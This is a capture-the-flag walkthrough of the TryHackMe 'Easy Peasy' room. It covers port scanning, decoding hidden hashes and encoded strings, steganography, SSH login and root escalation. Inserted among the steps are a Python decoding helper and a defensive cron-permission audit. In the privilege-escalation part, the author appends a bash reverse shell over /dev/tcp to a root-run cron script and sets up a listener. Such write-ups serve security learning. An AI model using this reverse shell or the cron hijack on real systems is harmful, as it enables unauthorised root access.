https://tryhackme.com/room/easypeasyctf
As always, I start off with an Nmap version scan of all ports:
nmap -sV -sC -p- -oN version-scan 10.10.135.48
So we have a number of ports open:
Port 80: open, HTTP (website)
Port 6498: open, SSH
Port 65524: open, HTTP (website)
Let's first look at the website on port 80:
Nothing here; checking the source also shows nothing of interest.
Is there a robots.txt file?
Nothing of interest here, so I will run a DirBuster scan:
Interesting, we see two directories /hidden and /hidden/whatever, let’s take a look:
The directory /hidden takes us to a screenshot; checking the source, there appears to be nothing of interest.
I downloaded the image as steganography was mentioned; however, I could not find any evidence of hidden content in the file.
Moving on to /hidden/whatever:
Again, a nice picture of Norway; however, looking at the source, we see a hidden paragraph containing what appears to be a base64-encoded string.
We have our first flag.
I also downloaded the .jpg, again checking for steganography, but could not find any hidden information. Given that the source title stated 'dead end', I moved on to the next port.
Moving on to enumerate Port 65524:
This opens up into the standard Apache 2 welcome screen; however, checking to see whether there is a robots.txt, we see the following:
This really confused me at this stage. I have completed a number of CTFs where I have had to change the User-Agent to access the website. Everything about this message indicated the same; however, nothing worked. I tried using Burp Suite and User Agent Switcher (Firefox plug-in). Then I thought it was possibly a hash.
After trying many different hash cracking sites and also Hydra, I had success with hashcrc. It is an MD5 hash.
Second Flag found.
Back to the Apache 2 website, I inspected the source and found flag 3.
Further enumeration of the source code identified the following:
Again, this seemed like a hash, and the comment states, "Its encoded with bas….".
Checking the hash with Hash ID, it stated it was base64; however, this did not work when trying to decode it. So let's try base62:
After a lot of searching I found a website that can decode base62: https://www.better-converter.com/Encoders-Decoders/Base62-Decode
The decoded string looked very much like a directory, and this worked, taking me to a Matrix-like page:
Checking the source code we see what looks like another hash:
Using the hash identifier at https://md5hashing.net/, quite a few options came up, so I tried them all starting from the top. Eventually the hash type GOST worked:
There is also a jpg file here called binarycodepixabay.jpg, maybe the hash is a password for a file contained in the image.
Use Steghide to check the image for steganography.
We find a file hidden in the image called secrettext.txt, let’s open it:
This looks like a possible SSH login; however, the key appears to be encoded in binary. We also have a username.
Converting from binary we get a new password:
iconvertedmypasswordtobinary
We can ssh into the system:
Looks like there is a timer; however, after one minute I am still in the system, so maybe it is just a panic message.
Get user.txt:
There is a clue here that it is "rotated" or something, so maybe this is using a ROT cipher. My website of choice for ciphers is https://www.dcode.fr/rot-cipher
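The encodings met on this box (base64, base62, a binary-encoded password, and a ROT-shifted flag) are all decodable offline. The following helper is an added example, not code from the room or the write-up, and it bundles the decoders used along the way: a base62 decoder (the alphabet ordering 0-9A-Za-z is an assumption, since base62 has no single standard), a binary-to-text converter, a ROT brute-forcer, a length-based hash family guess like the one hash-identifier sites start from, and a try-everything function for strings found in page source. All sample inputs in the tests are constructed, not values from the box.

```python
import base64
import binascii
import re
import string
from typing import Dict, List, Optional, Tuple

# Assumed base62 alphabet: digits, then upper case, then lower case.
# Base62 has no single standard ordering; if a decoded value looks wrong,
# swap the two letter blocks and try again.
B62_ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase


def base62_decode(text: str) -> bytes:
    """Decode a big-endian, unpadded base62 string into bytes."""
    value = 0
    for ch in text:
        value = value * 62 + B62_ALPHABET.index(ch)
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    # A leading '0' digit stands for a leading zero byte, which the integer form loses.
    leading = len(text) - len(text.lstrip(B62_ALPHABET[0]))
    return b"\x00" * leading + body


def base62_encode(data: bytes) -> str:
    """Inverse of base62_decode, handy for round-trip checking the alphabet choice."""
    leading = len(data) - len(data.lstrip(b"\x00"))
    value = int.from_bytes(data, "big")
    digits = ""
    while value:
        value, rem = divmod(value, 62)
        digits = B62_ALPHABET[rem] + digits
    return B62_ALPHABET[0] * leading + digits


def binary_to_text(bits: str) -> str:
    """Turn a string of 0/1 characters (spaces optional) into ASCII, 8 bits per byte."""
    digits = re.sub(r"[^01]", "", bits)
    if not digits or len(digits) % 8:
        raise ValueError("bit string must be a non-empty multiple of 8 bits")
    return bytes(int(digits[i:i + 8], 2) for i in range(0, len(digits), 8)).decode("ascii")


def rot(text: str, shift: int) -> str:
    """Caesar/ROT shift of letters only; digits and punctuation pass through."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def rot_candidates(text: str) -> Dict[int, str]:
    """All 25 non-identity rotations; pick the readable one by eye or with a word list."""
    return {n: rot(text, n) for n in range(1, 26)}


# Hash families that share a hex digest length; length alone cannot separate them,
# which is why the write-up had to try several types before GOST matched.
HASH_LENGTHS = {
    32: ["MD5", "MD4", "NTLM"],
    40: ["SHA-1", "RIPEMD-160"],
    64: ["SHA-256", "SHA3-256", "GOST R 34.11-94"],
    128: ["SHA-512", "Whirlpool"],
}


def hash_guess(text: str) -> List[str]:
    """Guess candidate hash families from digest length; empty list if the string is not hex."""
    if not re.fullmatch(r"[0-9a-fA-F]+", text):
        return []
    return HASH_LENGTHS.get(len(text), [])


def _printable(data: bytes) -> Optional[str]:
    """Return the text if the bytes decode to printable UTF-8, else None."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def try_decodings(text: str) -> List[Tuple[str, str]]:
    """Try base64, base62 and binary on one string; keep the decodings that give printable text."""
    results: List[Tuple[str, str]] = []
    try:
        decoded = _printable(base64.b64decode(text, validate=True))
        if decoded:
            results.append(("base64", decoded))
    except (binascii.Error, ValueError):
        pass
    if text and all(c in B62_ALPHABET for c in text):
        decoded = _printable(base62_decode(text))
        if decoded:
            results.append(("base62", decoded))
    if re.fullmatch(r"[01 ]+", text):
        try:
            results.append(("binary", binary_to_text(text)))
        except (ValueError, UnicodeDecodeError):
            pass
    return results
```

Running try_decodings on each suspicious string pulled from a page's source saves the trial-and-error of feeding it to one web converter after another, and the hash_guess list makes it clear why a 64-hex-character digest needs several hash types tried rather than just SHA-256.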
We have the user Flag.
Time to Privesc this Linux box:
First thing: sudo -l, but the user has no sudo rights.
From here I set up an HTTP server on my Kali box and uploaded the LinEnum.sh script to the /home/boring directory.
After making LinEnum.sh executable with chmod, I ran it: ./LinEnum.sh
There is an interesting cron job, .mysecretcronjob.sh, being run every minute. We can see that it is being run by root.
Need to find that file:
Let's check to see whether we have write access to that file.
Excellent, we can see that we have access to amend this file; let's open it and see what it says.
Fantastic, let's append a shell to this file:
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' >> /var/www/.mysecretcronjob.sh
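The root cause on this box is a script that root runs from cron but that a low-privilege user can write to. The audit below is an added example (not from the room, the write-up, or LinEnum) that a defender can run to catch exactly this class of misconfiguration: it parses /etc/crontab-style lines, takes the first absolute path in each root-owned job's command, and flags it if the file is not owned by root or is group- or world-writable. The crontab text and the ownership/mode table are constructed sample data; the real run at the bottom uses os.stat on the live system.

```python
import os
import stat
from dataclasses import dataclass
from typing import Callable, Iterator, List, Optional, Tuple

# Constructed sample in /etc/crontab format: five time fields, a user, then the command.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    /var/www/.mysecretcronjob.sh
0 3     * * *   backup  /usr/local/bin/backup.sh
"""

# Constructed metadata standing in for os.stat: path -> (owner uid, permission bits).
SAMPLE_STAT = {
    "/var/www/.mysecretcronjob.sh": (33, 0o777),  # owned by www-data, writable by everyone
    "/usr/local/bin/backup.sh": (0, 0o755),       # owned by root, writable only by root
}

StatLookup = Callable[[str], Optional[Tuple[int, int]]]


@dataclass
class Finding:
    command: str
    script: str
    reason: str


def parse_system_crontab(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (user, command) from /etc/crontab-style text; skip comments, blanks and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield fields[5], fields[6]


def script_path(command: str) -> Optional[str]:
    """Heuristic: the first absolute path in the command is the thing cron executes."""
    for token in command.split():
        if token.startswith("/"):
            return token
    return None


def audit_cron(text: str, lookup: StatLookup) -> List[Finding]:
    """Flag root-run cron scripts that a non-root user could modify."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue  # only jobs running as root hand out root to whoever edits the script
        path = script_path(command)
        info = lookup(path) if path else None
        if info is None:
            continue  # no path, or the file does not exist on this system
        uid, mode = info
        reasons = []
        if uid != 0:
            reasons.append(f"owned by uid {uid}, not root")
        if mode & stat.S_IWOTH:
            reasons.append("world-writable")
        elif mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if reasons:
            findings.append(Finding(command, path, "; ".join(reasons)))
    return findings


def real_stat(path: str) -> Optional[Tuple[int, int]]:
    """os.stat wrapper returning (uid, mode bits), or None if the path is missing."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, stat.S_IMODE(st.st_mode)


if __name__ == "__main__":
    # Audit the live system crontab when it exists, otherwise the constructed sample.
    if os.path.exists("/etc/crontab"):
        with open("/etc/crontab") as fh:
            text, lookup = fh.read(), real_stat
    else:
        text, lookup = SAMPLE_CRONTAB, SAMPLE_STAT.get
    for f in audit_cron(text, lookup):
        print(f"RISK: {f.script} ({f.reason}) in job: {f.command}")
```

The fix for anything the audit reports is the boring one: chown the script to root, clear the group/other write bits, and make sure its parent directory is not writable by the web or service account either. The same check is worth extending to the files under /etc/cron.d and /etc/cron.* directories, which follow the same line format.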
Next I am going to set up a listener on my Kali box. Instead of using Netcat, I am going to use the excellent pwncat, available from:
https://github.com/calebstewart/pwncat
This is so awesome, you really need to check this out. It is like a cross between Metasploit and Netcat. It gives you a fully elevated TTY shell without needing to run a Python PTY script. It also allows automated privesc, upload and download, and so much more.
Set up a pwncat listener:
A nice beginners box with lots of hash challenges along the way.